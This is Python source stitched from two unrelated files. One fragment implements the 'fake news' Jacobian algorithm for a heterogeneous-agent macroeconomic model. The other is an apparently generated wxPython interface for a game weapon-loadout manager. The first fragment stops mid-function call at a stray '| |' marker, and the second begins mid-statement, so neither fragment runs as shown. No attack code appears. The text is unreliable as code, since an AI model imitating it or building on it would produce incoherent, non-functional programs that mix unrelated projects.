curlyV, curlyD, curlyY = self.backward_step_fakenews(din_dict, output_list, ssin_dict, ssout_list,
Dss, Pi_T, sspol_i, sspol_pi, sspol_space, h)
# infer dimensions from this and initialize empty arrays
curlyDs = np.empty((T,) + curlyD.shape)
curlyYs = {k: np.empty(T) for k in curlyY.keys()}
# fill in current effect of shock
curlyDs[0, ...] = curlyD
for k in curlyY.keys():
curlyYs[k][0] = curlyY[k]
# fill in anticipation effects
for t in range(1, T):
curlyV, curlyDs[t, ...], curlyY = self.backward_step_fakenews({k+'_p': v for k, v in curlyV.items()},
output_list, ssin_dict, ssout_list,
Dss, Pi_T, sspol_i, sspol_pi, sspol_space, h)
for k in curlyY.keys():
curlyYs[k][t] = curlyY[k]
return curlyYs, curlyDs
def forward_iteration_fakenews(self, o_ss, Pi, pol_i_ss, pol_pi_ss, T):
"""Iterate transpose forward T steps to get full set of curlyPs for a given outcome.
Note we depart from definition in paper by applying the demeaning operator in addition to Lambda
at each step. This does not affect products with curlyD (which are the only way curlyPs enter
Jacobian) since perturbations to distribution always have mean zero. It has numerical benefits
since curlyPs now go to zero for high t (used in paper in proof of Proposition 1).
"""
curlyPs = np.empty((T,) + o_ss.shape)
curlyPs[0, ...] = utils.demean(o_ss)
for t in range(1, T):
curlyPs[t, ...] = utils.demean(self.forward_step_transpose(curlyPs[t-1, ...], Pi, pol_i_ss, pol_pi_ss))
return curlyPs
@staticmethod
def build_F(curlyYs, curlyDs, curlyPs):
T = curlyDs.shape[0]
Tpost = curlyPs.shape[0] - T + 2
F = np.empty((Tpost + T - 1, T))
F[0, :] = curlyYs
F[1:, :] = curlyPs.reshape((Tpost + T - 2, -1)) @ curlyDs.reshape((T, -1)).T
return F
@staticmethod
def J_from_F(F):
J = F.copy()
for t in range(1, J.shape[1]):
J[1:, t] += J[:-1, t - 1]
return J
'''Part 5: helpers for .jac and .ajac: preliminary processing and clearing saved info'''
def jac_prelim(self, ss, save=False, use_saved=False):
"""Helper that does preliminary processing of steady state for fake news algorithm.
Parameters
----------
ss : dict, all steady-state info, intended to be from .ss()
save : [optional] bool, whether to store results in .prelim_saved attribute
use_saved : [optional] bool, whether to use already-stored results in .prelim_saved
Returns
----------
ssin_dict : dict, ss vals of exactly the inputs needed by self.back_step_fun for backward step
Pi : array (S*S), Markov matrix for exogenous state
ssout_list : tuple, what self.back_step_fun returns when given ssin_dict (not exactly the same
as steady-state numerically since SS convergence was to some tolerance threshold)
ss_for_hetinput : dict, ss vals of exactly the inputs needed by self.hetinput (if it exists)
sspol_i : dict, indices on lower bracketing gridpoint for all in self.policy
sspol_pi : dict, weights on lower bracketing gridpoint for all in self.policy
sspol_space : dict, space between lower and upper bracketing gridpoints for all in self.policy
"""
output_names = ('ssin_dict', 'Pi', 'ssout_list',
'ss_for_hetinput', 'sspol_i', 'sspol_pi', 'sspol_space')
if use_saved:
if self.prelim_saved:
return tuple(self.prelim_saved[k] for k in output_names)
else:
raise ValueError('Nothing saved to be used by jac_prelim!')
# preliminary a: obtain ss inputs and other info, run once to get baseline for numerical differentiation
ssin_dict = self.make_inputs(ss)
Pi = ss[self.exogenous]
grid = {k: ss[k+'_grid'] for k in self.policy}
ssout_list = self.back_step_fun(**ssin_dict)
ss_for_hetinput = None
if self.hetinput is not None:
ss_for_hetinput = {k: ss[k] for k in self.hetinput_inputs if k in ss}
# preliminary b: get sparse representations of policy rules, and distance between neighboring policy gridpoints
sspol_i = {}
sspol_pi = {}
sspol_space = {}
for pol in self.policy:
# use robust binary-search-based method that only requires grids to be monotonic
sspol_i[pol], sspol_pi[pol] = utils.interpolate_coord_robust(grid[pol], ss[pol])
sspol_space[pol] = grid[pol][sspol_i[pol]+1] - grid[pol][sspol_i[pol]]
toreturn = (ssin_dict, Pi, ssout_list, ss_for_hetinput, sspol_i, sspol_pi, sspol_space)
if save:
self.prelim_saved = {k: v for (k, v) in zip(output_names, toreturn)}
return toreturn
def clear_saved(self):
"""Erase any saved Jacobian information from .jac or .ajac (e.g. if steady state changes)"""
self.saved = {}
self.prelim_saved = {}
self.saved_shock_list = []
self.saved_output_list = []
'''Part 6: helper to extract inputs and potentially process them through hetinput'''
def make_inputs(self, indict):
"""Extract from indict exactly the inputs needed for self.back_step_fun,
process stuff through hetinput first if it's there"""
if self.hetinput is not None:
outputs_as_tuple = utils.make_tuple(self.hetinput(**{k: indict[k] for k in self.hetinput_inputs if k in indict}))
indict.update(dict(zip(self.hetinput_outputs_order, outputs_as_tuple)))
indict_new = {k: indict[k] for k in self.all_inputs - self.inputs_p if k in indict}
try:
return {**indict_new, **{k + '_p': indict[k] for k in self.inputs_p}}
except KeyError as e:
print(f'Missing backward variable or Markov matrix {e} for {self.back_step_fun.__name__}!')
raise
'''Part 7: routines to do forward steps of different kinds, all wrap functions in utils'''
def forward_step(self, D, Pi_T, pol_i, pol_pi):
"""Update distribution, calling on 1d and 2d-specific compiled routines.
Parameters
----------
D : array, beginning-of-period distribution
Pi_T : array, transpose Markov matrix
pol_i : dict, indices on lower bracketing gridpoint for all in self.policy
pol_pi : dict, weights on lower bracketing gridpoint for all in self.policy
Returns
----------
Dnew : array, beginning-of-next-period distribution
"""
if len(self.policy) == 1:
p, = self.policy
return utils.forward_step_1d(D, Pi_T, pol_i[p], pol_pi[p])
elif len(self.policy) == 2:
p1, p2 = self.policy
return utils.forward_step_2d(D, Pi_T, pol_i[p1], pol_i[p2], pol_pi[p1], pol_pi[p2])
else:
raise ValueError(f"{len(self.policy)} policy variables, only up to 2 implemented!")
def forward_step_transpose(self, D, Pi, pol_i, pol_pi):
"""Transpose of forward_step (note: this takes Pi rather than Pi_T as argument!)"""
if len(self.policy) == 1:
p, = self.policy
return utils.forward_step_transpose_1d(D, Pi, pol_i[p], pol_pi[p])
elif len(self.policy) == 2:
p1, p2 = self.policy
return utils.forward_step_transpose_2d(D, Pi, pol_i[p1], pol_i[p2], pol_pi[p1], | |
wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_SIMPLE )
self.m_panel_partselect_cm1.SetBackgroundColour( wx.Colour( 0, 64, 128 ) )
bSizerPSCM1 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bmToggleBtn_blrlm_camo = wx.BitmapToggleButton( self.m_panel_partselect_cm1, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.Size( 32,32 ), wx.BORDER_NONE )
self.m_bmToggleBtn_blrlm_camo.SetBitmap( wx.NullBitmap )
self.m_bmToggleBtn_blrlm_camo.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
bSizerPSCM1.Add( self.m_bmToggleBtn_blrlm_camo, 0, wx.ALL, 0 )
self.m_bitmap_blrlm_camo = wx.StaticBitmap( self.m_panel_partselect_cm1, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_bitmap_blrlm_camo.SetMinSize( wx.Size( 64,32 ) )
self.m_bitmap_blrlm_camo.SetMaxSize( wx.Size( 64,32 ) )
bSizerPSCM1.Add( self.m_bitmap_blrlm_camo, 0, wx.LEFT|wx.RIGHT, 8 )
self.m_staticText_blrlm_camo = wx.StaticText( self.m_panel_partselect_cm1, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_blrlm_camo.Wrap( -1 )
self.m_staticText_blrlm_camo.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_HIGHLIGHTTEXT ) )
bSizerPSCM1.Add( self.m_staticText_blrlm_camo, 1, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 0 )
self.m_bpButton_blrlm_camo_reset = wx.BitmapButton( self.m_panel_partselect_cm1, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.Size( 32,32 ), wx.BU_AUTODRAW|0|wx.BORDER_NONE )
self.m_bpButton_blrlm_camo_reset.SetBackgroundColour( wx.Colour( 0, 64, 128 ) )
bSizerPSCM1.Add( self.m_bpButton_blrlm_camo_reset, 0, wx.ALL, 0 )
self.m_panel_partselect_cm1.SetSizer( bSizerPSCM1 )
self.m_panel_partselect_cm1.Layout()
bSizerPSCM1.Fit( self.m_panel_partselect_cm1 )
bSizerPartSelect.Add( self.m_panel_partselect_cm1, 0, wx.EXPAND |wx.ALL, 4 )
self.m_panel14 = PartSelectPanel( self.m_panel_partselect, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_SIMPLE )
bSizerPartSelect.Add( self.m_panel14, 0, wx.EXPAND |wx.ALL, 4 )
bSizer19.Add( bSizerPartSelect, 0, wx.EXPAND, 0 )
bSizer22 = wx.BoxSizer( wx.VERTICAL )
bSizer24 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bmToggleBtnLoadout1 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnLoadout1.SetValue( True )
self.m_bmToggleBtnLoadout1.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnLoadout1.Enable( False )
self.m_bmToggleBtnLoadout1.SetMinSize( wx.Size( 130,24 ) )
bSizer24.Add( self.m_bmToggleBtnLoadout1, 0, wx.LEFT|wx.RIGHT, 2 )
bSizer24.Add( ( 0, 0), 1, wx.EXPAND, 5 )
self.m_bmToggleBtnLoadout2 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnLoadout2.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnLoadout2.Enable( False )
self.m_bmToggleBtnLoadout2.SetMinSize( wx.Size( 130,24 ) )
bSizer24.Add( self.m_bmToggleBtnLoadout2, 0, wx.LEFT|wx.RIGHT, 2 )
bSizer24.Add( ( 0, 0), 1, wx.EXPAND, 5 )
self.m_bmToggleBtnLoadout3 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnLoadout3.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnLoadout3.Enable( False )
self.m_bmToggleBtnLoadout3.SetMinSize( wx.Size( 130,24 ) )
bSizer24.Add( self.m_bmToggleBtnLoadout3, 0, wx.LEFT|wx.RIGHT, 2 )
bSizer22.Add( bSizer24, 0, wx.EXPAND, 0 )
bSizer21 = wx.BoxSizer( wx.HORIZONTAL )
bSizer221 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bmToggleBtnPrimary1 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnPrimary1.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnPrimary1.SetMinSize( wx.Size( 64,64 ) )
bSizer221.Add( self.m_bmToggleBtnPrimary1, 0, wx.LEFT|wx.RIGHT|wx.TOP, 2 )
self.m_bmToggleBtnSecondary1 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnSecondary1.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnSecondary1.SetMinSize( wx.Size( 64,64 ) )
bSizer221.Add( self.m_bmToggleBtnSecondary1, 0, wx.BOTTOM|wx.RIGHT|wx.TOP, 2 )
bSizer21.Add( bSizer221, 0, wx.EXPAND, 5 )
bSizer21.Add( ( 0, 0), 1, wx.EXPAND, 5 )
bSizer211 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bmToggleBtnPrimary2 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnPrimary2.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnPrimary2.SetMinSize( wx.Size( 64,64 ) )
bSizer211.Add( self.m_bmToggleBtnPrimary2, 0, wx.LEFT|wx.RIGHT|wx.TOP, 2 )
self.m_bmToggleBtnSecondary2 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnSecondary2.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnSecondary2.SetMinSize( wx.Size( 64,64 ) )
bSizer211.Add( self.m_bmToggleBtnSecondary2, 0, wx.BOTTOM|wx.RIGHT|wx.TOP, 2 )
bSizer21.Add( bSizer211, 0, wx.EXPAND, 5 )
bSizer21.Add( ( 0, 0), 1, wx.EXPAND, 5 )
bSizer2111 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bmToggleBtnPrimary3 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnPrimary3.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnPrimary3.SetMinSize( wx.Size( 64,64 ) )
bSizer2111.Add( self.m_bmToggleBtnPrimary3, 0, wx.LEFT|wx.RIGHT|wx.TOP, 2 )
self.m_bmToggleBtnSecondary3 = wx.BitmapToggleButton( self.m_panel_partselect, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_NONE )
self.m_bmToggleBtnSecondary3.SetBackgroundColour( wx.Colour( 48, 48, 48 ) )
self.m_bmToggleBtnSecondary3.SetMinSize( wx.Size( 64,64 ) )
bSizer2111.Add( self.m_bmToggleBtnSecondary3, 0, wx.BOTTOM|wx.RIGHT|wx.TOP, 2 )
bSizer21.Add( bSizer2111, 0, wx.EXPAND, 5 )
bSizer22.Add( bSizer21, 1, wx.EXPAND, 5 )
bSizer19.Add( bSizer22, 0, wx.ALL|wx.EXPAND, 4 )
self.m_panel_partselect.SetSizer( bSizer19 )
self.m_panel_partselect.Layout()
bSizer19.Fit( self.m_panel_partselect )
bSizer3.Add( self.m_panel_partselect, 1, wx.EXPAND |wx.ALL, 8 )
bSizer_blrlm_main.Add( bSizer3, 0, wx.EXPAND, 0 )
bSizer10 = wx.BoxSizer( wx.VERTICAL )
self.m_listCtrl_blrlm_selector = wx.ListCtrl( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_HRULES|wx.LC_REPORT|wx.LC_SINGLE_SEL|wx.BORDER_SIMPLE )
self.m_listCtrl_blrlm_selector.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOWTEXT ) )
self.m_listCtrl_blrlm_selector.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
self.m_listCtrl_blrlm_selector.SetMinSize( wx.Size( 720,480 ) )
bSizer10.Add( self.m_listCtrl_blrlm_selector, 1, wx.BOTTOM|wx.EXPAND|wx.RIGHT|wx.TOP, 8 )
self.m_panel11 = BitmapPanel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.BORDER_STATIC )
bSizer11 = wx.BoxSizer( wx.HORIZONTAL )
bSizer14 = wx.BoxSizer( wx.VERTICAL )
bSizer12 = wx.BoxSizer( wx.HORIZONTAL )
self.m_staticText6 = wx.StaticText( self.m_panel11, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText6.Wrap( -1 )
self.m_staticText6.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_HIGHLIGHTTEXT ) )
bSizer12.Add( self.m_staticText6, 0, wx.LEFT, 4 )
bSizer14.Add( bSizer12, 1, wx.EXPAND, 5 )
bSizer11.Add( bSizer14, 1, wx.EXPAND, 5 )
bSizer15 = wx.BoxSizer( wx.HORIZONTAL )
bSizer15.SetMinSize( wx.Size( 512,-1 ) )
self.m_panel121 = wx.Panel( self.m_panel11, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
self.m_panel121.Enable( False )
self.m_panel121.Hide()
bSizer121 = wx.BoxSizer( wx.HORIZONTAL )
self.m_staticText61 = wx.StaticText( self.m_panel121, wx.ID_ANY, u"Export Path:", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText61.Wrap( -1 )
self.m_staticText61.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_HIGHLIGHTTEXT ) )
self.m_staticText61.Enable( False )
self.m_staticText61.Hide()
bSizer121.Add( self.m_staticText61, 0, wx.ALIGN_CENTER_VERTICAL|wx.LEFT, 4 )
self.m_dirPicker1 = wx.DirPickerCtrl( self.m_panel121, wx.ID_ANY, wx.EmptyString, u"Select a folder", wx.DefaultPosition, wx.DefaultSize, wx.DIRP_DIR_MUST_EXIST|wx.DIRP_USE_TEXTCTRL )
self.m_dirPicker1.Enable( False )
self.m_dirPicker1.Hide()
bSizer121.Add( self.m_dirPicker1, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 4 )
self.m_button_export_loadout = wx.Button( self.m_panel121, wx.ID_ANY, u"Generate Loadout", wx.DefaultPosition, wx.DefaultSize, 0|wx.BORDER_THEME )
bSizer121.Add( self.m_button_export_loadout, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 4 )
self.m_panel121.SetSizer( bSizer121 )
self.m_panel121.Layout()
bSizer121.Fit( self.m_panel121 )
bSizer15.Add( self.m_panel121, 0, wx.ALL, 4 )
self.m_scintilla1 = wx.stc.StyledTextCtrl( self.m_panel11, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0)
self.m_scintilla1.SetUseTabs ( False )
self.m_scintilla1.SetTabWidth ( 4 )
self.m_scintilla1.SetIndent ( 4 )
self.m_scintilla1.SetTabIndents( True )
self.m_scintilla1.SetBackSpaceUnIndents( True )
self.m_scintilla1.SetViewEOL( False )
self.m_scintilla1.SetViewWhiteSpace( False )
self.m_scintilla1.SetMarginWidth( 2, 0 )
self.m_scintilla1.SetIndentationGuides( False )
self.m_scintilla1.SetReadOnly( False );
self.m_scintilla1.SetMarginWidth( 1, 0 )
self.m_scintilla1.SetMarginWidth ( 0, 0 )
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDER, wx.stc.STC_MARK_BOXPLUS )
self.m_scintilla1.MarkerSetBackground( wx.stc.STC_MARKNUM_FOLDER, wx.BLACK)
self.m_scintilla1.MarkerSetForeground( wx.stc.STC_MARKNUM_FOLDER, wx.WHITE)
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDEROPEN, wx.stc.STC_MARK_BOXMINUS )
self.m_scintilla1.MarkerSetBackground( wx.stc.STC_MARKNUM_FOLDEROPEN, wx.BLACK )
self.m_scintilla1.MarkerSetForeground( wx.stc.STC_MARKNUM_FOLDEROPEN, wx.WHITE )
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDERSUB, wx.stc.STC_MARK_EMPTY )
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDEREND, wx.stc.STC_MARK_BOXPLUS )
self.m_scintilla1.MarkerSetBackground( wx.stc.STC_MARKNUM_FOLDEREND, wx.BLACK )
self.m_scintilla1.MarkerSetForeground( wx.stc.STC_MARKNUM_FOLDEREND, wx.WHITE )
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDEROPENMID, wx.stc.STC_MARK_BOXMINUS )
self.m_scintilla1.MarkerSetBackground( wx.stc.STC_MARKNUM_FOLDEROPENMID, wx.BLACK)
self.m_scintilla1.MarkerSetForeground( wx.stc.STC_MARKNUM_FOLDEROPENMID, wx.WHITE)
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDERMIDTAIL, wx.stc.STC_MARK_EMPTY )
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDERTAIL, wx.stc.STC_MARK_EMPTY )
self.m_scintilla1.SetSelBackground( True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT ) )
self.m_scintilla1.SetSelForeground( True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHTTEXT ) )
bSizer15.Add( self.m_scintilla1, 1, wx.ALL|wx.EXPAND, 4 )
bSizer11.Add( bSizer15, 0, wx.EXPAND, 5 )
self.m_panel11.SetSizer( bSizer11 )
self.m_panel11.Layout()
bSizer11.Fit( self.m_panel11 )
bSizer10.Add( self.m_panel11, 1, wx.BOTTOM|wx.EXPAND|wx.RIGHT, 8 )
bSizer_blrlm_main.Add( bSizer10, 1, wx.EXPAND, 0 )
self.SetSizer( bSizer_blrlm_main )
self.Layout()
self.m_menubar1 = wx.MenuBar( 0|wx.BORDER_THEME|wx.CLIP_CHILDREN )
self.file = wx.Menu()
self.m_menuItem_file_playername = wx.MenuItem( self.file, wx.ID_ANY, u"Change Player Name", wx.EmptyString, wx.ITEM_NORMAL )
self.file.Append( self.m_menuItem_file_playername )
self.m_menuItem_file_playername.Enable( False )
self.m_menuItem_file_clearloadouts = wx.MenuItem( self.file, wx.ID_ANY, u"Clear All Loadouts", wx.EmptyString, wx.ITEM_NORMAL )
self.file.Append( self.m_menuItem_file_clearloadouts )
self.m_menuItem_file_clearloadouts.Enable( False )
self.m_menuItem_file_savesession = wx.MenuItem( self.file, wx.ID_ANY, u"Save Session", wx.EmptyString, wx.ITEM_NORMAL )
self.file.Append( self.m_menuItem_file_savesession )
self.m_menuItem_file_loadsession = wx.MenuItem( self.file, wx.ID_ANY, u"Load Session", wx.EmptyString, wx.ITEM_NORMAL )
self.file.Append( self.m_menuItem_file_loadsession )
self.m_menuItem_file_autosave = wx.MenuItem( self.file, wx.ID_ANY, u"Save Session on Exit", wx.EmptyString, wx.ITEM_CHECK )
self.file.Append( self.m_menuItem_file_autosave )
self.m_menuItem_file_autosave.Check( True )
self.m_menubar1.Append( self.file, u"File" )
self.edit = wx.Menu()
self.m_menuItem_edit_swapweapon = wx.MenuItem( self.edit, wx.ID_ANY, u"Swap Weapon", wx.EmptyString, wx.ITEM_NORMAL )
self.edit.Append( self.m_menuItem_edit_swapweapon )
self.m_menuItem_edit_swapweapon.Enable( False )
self.m_menubar1.Append( self.edit, u"Edit" )
self.view = wx.Menu()
self.m_menuItem_view_0 = wx.MenuItem( self.view, wx.ID_ANY, u"Some checkbox thing", wx.EmptyString, wx.ITEM_CHECK )
self.view.Append( self.m_menuItem_view_0 )
self.m_menuItem_view_0.Enable( False )
self.m_menubar1.Append( self.view, u"View" )
self.tools = wx.Menu()
self.m_menubar1.Append( self.tools, u"Tools" )
self.help = wx.Menu()
self.m_menuItem_about = wx.MenuItem( self.help, wx.ID_ANY, u"About", wx.EmptyString, wx.ITEM_NORMAL )
self.help.Append( self.m_menuItem_about )
self.m_menuItem_about.Enable( False )
self.m_menubar1.Append( self.help, u"Help" )
self.SetMenuBar( self.m_menubar1 )
self.Centre( wx.BOTH )
# Connect Events
self.Bind( wx.EVT_CLOSE, self.BLR_LMGR_FRAMEOnClose )
self.m_panel_partselect_re1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_re1OnLeftUp )
self.m_bmToggleBtn_blrlm_receiver.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_receiverOnToggleButton )
self.m_bitmap_blrlm_receiver.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_receiverOnLeftUp )
self.m_staticText_blrlm_receiver.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_receiverOnLeftUp )
self.m_bpButton_blrlm_receiver_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_receiver_resetOnButtonClick )
self.m_panel_partselect_mz1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_mz1OnLeftUp )
self.m_bmToggleBtn_blrlm_muzzle.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_muzzleOnToggleButton )
self.m_bitmap_blrlm_muzzle.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_muzzleOnLeftUp )
self.m_staticText_blrlm_muzzle.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_muzzleOnLeftUp )
self.m_bpButton_blrlm_muzzle_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_muzzle_resetOnButtonClick )
self.m_panel_partselect_gp1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_gp1OnLeftUp )
self.m_bmToggleBtn_blrlm_grip.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_gripOnToggleButton )
self.m_bitmap_blrlm_grip.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_gripOnLeftUp )
self.m_staticText_blrlm_grip.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_gripOnLeftUp )
self.m_bpButton_blrlm_grip_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_grip_resetOnButtonClick )
self.m_panel_partselect_ba1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_ba1OnLeftUp )
self.m_bmToggleBtn_blrlm_barrel.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_barrelOnToggleButton )
self.m_bitmap_blrlm_barrel.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_barrelOnLeftUp )
self.m_staticText_blrlm_barrel.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_barrelOnLeftUp )
self.m_bpButton_blrlm_barrel_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_barrel_resetOnButtonClick )
self.m_panel_partselect_mg1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_mg1OnLeftUp )
self.m_bmToggleBtn_blrlm_magazine.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_magazineOnToggleButton )
self.m_bitmap_blrlm_magazine.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_magazineOnLeftUp )
self.m_staticText_blrlm_magazine.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_magazineOnLeftUp )
self.m_bpButton_blrlm_magazine_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_magazine_resetOnButtonClick )
self.m_panel_partselect_sc1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_sc1OnLeftUp )
self.m_bmToggleBtn_blrlm_scope.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_scopeOnToggleButton )
self.m_bitmap_blrlm_scope.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_scopeOnLeftUp )
self.m_staticText_blrlm_scope.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_scopeOnLeftUp )
self.m_bpButton_blrlm_scope_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_scope_resetOnButtonClick )
self.m_panel_partselect_st1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_st1OnLeftUp )
self.m_bmToggleBtn_blrlm_stock.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_stockOnToggleButton )
self.m_bitmap_blrlm_stock.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_stockOnLeftUp )
self.m_staticText_blrlm_stock.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_stockOnLeftUp )
self.m_bpButton_blrlm_stock_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_stock_resetOnButtonClick )
self.m_panel_partselect_tg1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_tg1OnLeftUp )
self.m_bmToggleBtn_blrlm_tag.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_tagOnToggleButton )
self.m_bitmap_blrlm_tag.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_tagOnLeftUp )
self.m_staticText_blrlm_tag.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_tagOnLeftUp )
self.m_bpButton_blrlm_tag_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_tag_resetOnButtonClick )
self.m_panel_partselect_cm1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_cm1OnLeftUp )
self.m_bmToggleBtn_blrlm_camo.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_camoOnToggleButton )
self.m_bitmap_blrlm_camo.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_camoOnLeftUp )
self.m_staticText_blrlm_camo.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_camoOnLeftUp )
self.m_bpButton_blrlm_camo_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_camo_resetOnButtonClick )
self.m_bmToggleBtnLoadout1.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnLoadout1OnToggleButton )
self.m_bmToggleBtnLoadout2.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnLoadout2OnToggleButton )
self.m_bmToggleBtnLoadout3.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnLoadout3OnToggleButton )
self.m_bmToggleBtnPrimary1.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnPrimary1OnToggleButton )
self.m_bmToggleBtnSecondary1.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnSecondary1OnToggleButton )
